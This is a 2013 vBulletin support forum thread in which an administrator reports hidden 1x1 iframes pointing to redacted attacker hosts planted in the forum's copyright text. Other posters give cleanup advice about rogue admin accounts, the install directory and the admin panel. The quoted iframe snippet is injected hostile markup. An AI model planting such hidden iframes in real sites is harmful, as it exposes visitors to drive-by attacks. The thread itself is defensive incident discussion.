Anybody else finding a jobless jack iframe in their copyright field?

Collapse
X

• Time
  • Show
Clear All
  • biggazillakilla
    • Feb 2004

Anybody else finding a jobless jack iframe in their copyright field?

This was in my copyright text of the vBulletin forum:

vBulletin Admin Control Panel > Settings > Options > Site Name / URL / Contact Details > Copyright Text

Code:
    <br/><br/><iframe src="http://example.org/dns.html" width="1" height="1"></iframe><br/><iframe src="http://www.example.com/" width="1" height="1"></iframe><br/>
    The redacted URLs are for damnxd and the aforementioned jobless jack.
  • BirdOPrey5
    • Jul 2008

Have you deleted your install directory as directed by the latest announcement/eBulletin? If not you should do so immediately and then check for any Admin accounts you didn't create and delete them too.

Comment

• biggazillakilla
      • Feb 2004

Originally posted by Joe D.
      Have you deleted your install directory as directed by the latest announcement/eBulletin? If not you should do so immediately and then check for any Admin accounts you didn't create and delete them too.
      Sure did, right after receiving the security bulletin by email (on 2013-09-03).

And I just checked--yes, I had one user promoted to admin. It registered on 2013-09-01 and was active today.

Hopefully that'll keep them out.

Edit: Another other activities to look out for or changes they might make, at least that you're aware of?

Comment

• BirdOPrey5
        • Jul 2008

No, but I would htaccess password protect your Admin CP directory for extra safety.

Comment

• Wayne Luke
          vBulletin Technical Support Lead
          • Aug 2000

Moved to the proper location... Licensed Customer Feedback is not a Support Forum.
          Translations provided by Google.

Wayne Luke
          The Rabid Badger - a vBulletin Cloud demonstration site.
          vBulletin 5 API

Comment

• biggazillakilla
            • Feb 2004

Originally posted by Joe D.
            No, but I would htaccess password protect your Admin CP directory for extra safety.
            Done. Took a while, since I have some conflicts in my htaccess file, but I got it sorted out.

Thanks, Wayne. I didn't see the Support Forum when I looked. Now I know.

Comment

• parm775
              • Jan 2006
              • 3.7.x

Deleting the install directory does not stop creating of admin ids. One of my forums that I had deleted the install directory completely had two ids created both "admin" with administrator rights. I havent deleted them but have removed the e-mail address from them , changed passwords and banned them both.

This happened yesterday. I am running 4.2.1

Comment

• Zachery
                Former vBulletin Support
                • Jul 2002

Please read the following two blog posts:
                This guide is for what to do, after you’ve been hacked, exploited, and or defaced. Step 1, Change everything: If you believe, or think your site has

Getting Started This guide is intended to be a starting point for helping to keep your site safe and secure in the long run. It is not a be-all, end-all guide

Also please see these recent security announcements:

vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5
                vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions

Comment